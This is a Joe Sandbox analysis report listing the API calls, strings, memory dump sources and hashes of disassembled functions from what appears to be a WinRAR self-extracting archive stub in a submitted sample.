SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BCE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00BCE061
LoadIconW.USER32(00000000,00000064), ref: 00BCE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00BCE0C9
Sleep.KERNEL32(?), ref: 00BCE0F7
DeleteObject.GDI32 ref: 00BCE130
DeleteObject.GDI32(?), ref: 00BCE140
CloseHandle.KERNEL32 ref: 00BCE183

Strings

winrarsfxmappingfile.tmp, xrefs: 00BCDF77
sfxname, xrefs: 00BCDFF9
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00BCE039
C:\Users\user\Desktop, xrefs: 00BCDF33
STARTDLG, xrefs: 00BCE0BE
sfxstime, xrefs: 00BCE055

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 807099b7fa5e1333e901fccb68c8dcba511c19df7bfae11ddd93afbc8acf20d2
Instruction ID: 768bdcda5b7c044f18a75168004b8c0f3fb679c8c8a28e0b1021472af915bb3e
Opcode Fuzzy Hash: 807099b7fa5e1333e901fccb68c8dcba511c19df7bfae11ddd93afbc8acf20d2
Instruction Fuzzy Hash: 8561C171904285ABD320AB75AC8AF7B77ECEB48B04F0404ADF945A72A1DF78D944C762

Function 00BCA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6EC
LoadResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA703
LockResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BCB73D,00000066), ref: 00BCA72D
GlobalLock.KERNEL32(00000000), ref: 00BCA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BCA762
GlobalUnlock.KERNEL32(00000000), ref: 00BCA7C6

Part of subcall function 00BCA626: GdipAlloc.GDIPLUS(00000010), ref: 00BCA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BCA7A7
GlobalFree.KERNEL32(00000000), ref: 00BCA7CD

Strings

PNG, xrefs: 00BCA6C6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: f199cb2d1cd890fd85ec0b8c694f60d19810946bd73e33f6553b777dafc1d33f
Instruction ID: d44358eaadd8402511f7e747b88fe9683a62a4cfb64374120da1458c9e7d1c8a
Opcode Fuzzy Hash: f199cb2d1cd890fd85ec0b8c694f60d19810946bd73e33f6553b777dafc1d33f
Instruction Fuzzy Hash: 63318D75601346ABC7109F21EC88E2BBBE8FF84B65B00095EF80597661EF31DC40DAA2

Function 00BBA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6C4

Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA728
GetLastError.KERNEL32(?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA734

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 2b485b5784f63baf11f54d0f152d8576cc4d99b8bf785898c4be491b36ab1dfc
Instruction ID: 7bcf304260bafe9dfc37be6840cff771e176a554632cf6268a4344e64dd64ec0
Opcode Fuzzy Hash: 2b485b5784f63baf11f54d0f152d8576cc4d99b8bf785898c4be491b36ab1dfc
Instruction Fuzzy Hash: EA414C76900555ABCB25DF68CC88BEAB7F8FB48350F10459AE55AE3201DB746E908F90

Function 00BD7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002,00000000), ref: 00BD7E0F
TerminateProcess.KERNEL32(00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002,00000000), ref: 00BD7E16
ExitProcess.KERNEL32 ref: 00BD7E28

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 481b2fdf2028198e624de245701711426c564da7bb02cb3163fd8c2e74e9b982
Instruction ID: bce8dd7479e0a8c6954d4be0b8b544aa622de38cf9d1a39009dc6460fda4316c
Opcode Fuzzy Hash: 481b2fdf2028198e624de245701711426c564da7bb02cb3163fd8c2e74e9b982
Instruction Fuzzy Hash: E6E0B631054188EBCF11AF64DD4DA9ABFEAEB50741B004496F8199B232EF36DE52DB90

Function 00BB848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB8493

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dabfea00f0005fe26fe20e7ef823c563294611f087f09d40b4aa9ac7a5852bab
Instruction ID: ffc1301cfe4b7fd256a988c81a531658dcbf22efcca466a71e2fe4a31b6578d1
Opcode Fuzzy Hash: dabfea00f0005fe26fe20e7ef823c563294611f087f09d40b4aa9ac7a5852bab
Instruction Fuzzy Hash: A282D770904245AFDF25DF64C891BFABBEDEF15300F0845F9E9499B242DBB15A88CB60

Function 00BCB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BCB7E5

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB8EF
IsDialogMessageW.USER32(?,?), ref: 00BCB902
TranslateMessage.USER32(?), ref: 00BCB910
DispatchMessageW.USER32(?), ref: 00BCB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00BCB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00BCB960
GetDlgItem.USER32(?,00000068), ref: 00BCB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCB99E
SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCB9B1

Part of subcall function 00BCD453: _wcslen.LIBCMT ref: 00BCD47D

SetFocus.USER32(00000000), ref: 00BCB9B8
_swprintf.LIBCMT ref: 00BCBA24

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

Part of subcall function 00BCD4D4: GetDlgItem.USER32(00000068,00C0FCB8), ref: 00BCD4E8
Part of subcall function 00BCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00BCAF07,00000001,?,?,00BCB7B9,00BE506C,00C0FCB8,00C0FCB8,00001000,00000000,00000000), ref: 00BCD510
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BCD51B
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BE35F4), ref: 00BCD529
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD53F
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BCD559
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD59D
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BCD5AB
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BCD5BA
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BCD5E1
Part of subcall function 00BCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00BE43F4), ref: 00BCD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00BCBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00BCBA90
GetTickCount.KERNEL32 ref: 00BCBAAE
_swprintf.LIBCMT ref: 00BCBAC2
GetLastError.KERNEL32(?,00000011), ref: 00BCBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00BCBB43
_swprintf.LIBCMT ref: 00BCBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00BCBBD0
GetCommandLineW.KERNEL32 ref: 00BCBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00BCBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00BCBC6F
Sleep.KERNEL32(00000064), ref: 00BCBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00BCBCE2
CloseHandle.KERNEL32(00000000), ref: 00BCBCEB
_swprintf.LIBCMT ref: 00BCBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCBD7D
SetDlgItemTextW.USER32(?,00000065,00BE35F4), ref: 00BCBD94
GetDlgItem.USER32(?,00000065), ref: 00BCBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00BCBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BCBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCBE68
_wcslen.LIBCMT ref: 00BCBEBE
_swprintf.LIBCMT ref: 00BCBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00BCBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00BCBF4C
GetDlgItem.USER32(?,00000068), ref: 00BCBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00BCBF6B
GetDlgItem.USER32(?,00000066), ref: 00BCBF85
SetWindowTextW.USER32(00000000,00BFA472), ref: 00BCBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00BCC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00BCC0BD
EnableWindow.USER32(00000000,00000000), ref: 00BCC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00BCC1D9

Part of subcall function 00BCC73F: __EH_prolog.LIBCMT ref: 00BCC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00BCC1FD

Strings

winrarsfxmappingfile.tmp, xrefs: 00BCBBA6
__tmp_rar_sfx_access_check_%u, xrefs: 00BCBAB5
"%s"%s, xrefs: 00BCBD0D
<, xrefs: 00BCBB84
LICENSEDLG, xrefs: 00BCC0B2
@, xrefs: 00BCBB91
-el -s2 "-d%s" "-sp%s", xrefs: 00BCBB6B
C:\Users\user\Desktop, xrefs: 00BCBBC9
%s, xrefs: 00BCBED8
STARTDLG, xrefs: 00BCB801

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 747986e71b51ce33878e94d4135f4d17c57b8f2338de0b874c7505da21a93409
Instruction ID: cd53e2cef21cb33a8268dc9d55d05fc719d57c1c88cc428f67b81d5cf8b3d2cb
Opcode Fuzzy Hash: 747986e71b51ce33878e94d4135f4d17c57b8f2338de0b874c7505da21a93409
Instruction Fuzzy Hash: 5E42A471944248BAEB219B749C4AFFE7BECEB12704F0441DDF645A71E2CBB45A44CB22

Function 00BC0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00BC087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BC088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BC08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BC0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BC0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00BE3C7C,00000000), ref: 00BC0BB1
CloseHandle.KERNEL32(00000000), ref: 00BC0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BC0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00BE3C7C,?,00000000,?,00000800), ref: 00BC0C72
GetFileAttributesW.KERNELBASE(?,?,00BE3C7C,00000800,?,00000000,?,00000800), ref: 00BC0C9C
GetFileAttributesW.KERNEL32(?,?,00BE3D44,00000800), ref: 00BC0CD8

Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858

_swprintf.LIBCMT ref: 00BC0D4A
_swprintf.LIBCMT ref: 00BC0D96

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

AllocConsole.KERNEL32 ref: 00BC0D9E
GetCurrentProcessId.KERNEL32 ref: 00BC0DA8
AttachConsole.KERNEL32(00000000), ref: 00BC0DAF
_wcslen.LIBCMT ref: 00BC0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BC0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00BC0DDC
Sleep.KERNEL32(00002710), ref: 00BC0DE7
FreeConsole.KERNEL32 ref: 00BC0DED
ExitProcess.KERNEL32 ref: 00BC0DF5

Strings

uxtheme.dll, xrefs: 00BC0D17
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00BC0D84
SetDefaultDllDirectories, xrefs: 00BC08B9
DXGIDebug.dll, xrefs: 00BC08FC, 00BC0C5E
kernel32, xrefs: 00BC0873
dwmapi.dll, xrefs: 00BC0927, 00BC0D0D
SetDllDirectoryW, xrefs: 00BC0888

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 23fc64e3c03549131e3bc157ab423f250a91341d44a35cf53f299a26fe2714bd
Instruction ID: 6ac8e4cab9532b5471d35fa41bb1331760b5183cdb3207a48f545ef13ffcaec1
Opcode Fuzzy Hash: 23fc64e3c03549131e3bc157ab423f250a91341d44a35cf53f299a26fe2714bd
Instruction Fuzzy Hash: 58D145B24183C4ABD731EF51888DF9FBBE8EB85B04F50499DF28597151CBB48648CB62

Function 00BCC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00BCC744

Part of subcall function 00BCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BCB3FB

_wcslen.LIBCMT ref: 00BCCA0A
_wcslen.LIBCMT ref: 00BCCA13
SetWindowTextW.USER32(?,?), ref: 00BCCA71
_wcslen.LIBCMT ref: 00BCCAB3
_wcsrchr.LIBVCRUNTIME ref: 00BCCBFB
GetDlgItem.USER32(?,00000066), ref: 00BCCC36
SetWindowTextW.USER32(00000000,?), ref: 00BCCC46
SendMessageW.USER32(00000000,00000143,00000000,00BFA472), ref: 00BCCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BCCC7F

Strings

%s.%d.tmp, xrefs: 00BCC940
ProgramFilesDir, xrefs: 00BCCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00BCCB1A
<br>, xrefs: 00BCC9D4

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 32a54b4dae8898289c2e71745beff5793b263fb3e4e40f459c2e8a609ae96647
Instruction ID: a8d8047bc3bd8bd89ad4fc76e6334a38740dc9d720546acc6084ee93449fe79d
Opcode Fuzzy Hash: 32a54b4dae8898289c2e71745beff5793b263fb3e4e40f459c2e8a609ae96647
Instruction Fuzzy Hash: F5E150B2900258ABDB25DBA0DC85FEE77FCEB14710F4040EAF609E7151EB749E848B65

Function 00BBDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BBDAAC

Part of subcall function 00BBC29A: _wcslen.LIBCMT ref: 00BBC2A2

Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0

Part of subcall function 00BC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BBBAE9,00000000,?,?,?,0001044E), ref: 00BC1BA0

_wcslen.LIBCMT ref: 00BBDDE9
__fprintf_l.LIBCMT ref: 00BBDF1C

Strings

@%s:, xrefs: 00BBDF06, 00BBDF12
a, xrefs: 00BBDC16
*messages***, xrefs: 00BBDBC1
, xrefs: 00BBDD6C
RTL, xrefs: 00BBDEDE
R, xrefs: 00BBDC0C
,, xrefs: 00BBDF57
$%s:, xrefs: 00BBDEFF
*messages***, xrefs: 00BBDBFA

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: ffb30c8d5a5c7cd9ae0c7777a29e90fce47785dcaa6d0217c3a7878e59c6ed94
Instruction ID: ab21d8e5ca7b7879e3d48018b6002eb9cc20a514e6981b58a3c4ae21390cdde2
Opcode Fuzzy Hash: ffb30c8d5a5c7cd9ae0c7777a29e90fce47785dcaa6d0217c3a7878e59c6ed94
Instruction Fuzzy Hash: 8432CF719002189BCF24EF68C886BFE77E5EF14700F5005AAF916A72A1EBB5DD85CB50

Function 00BCD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

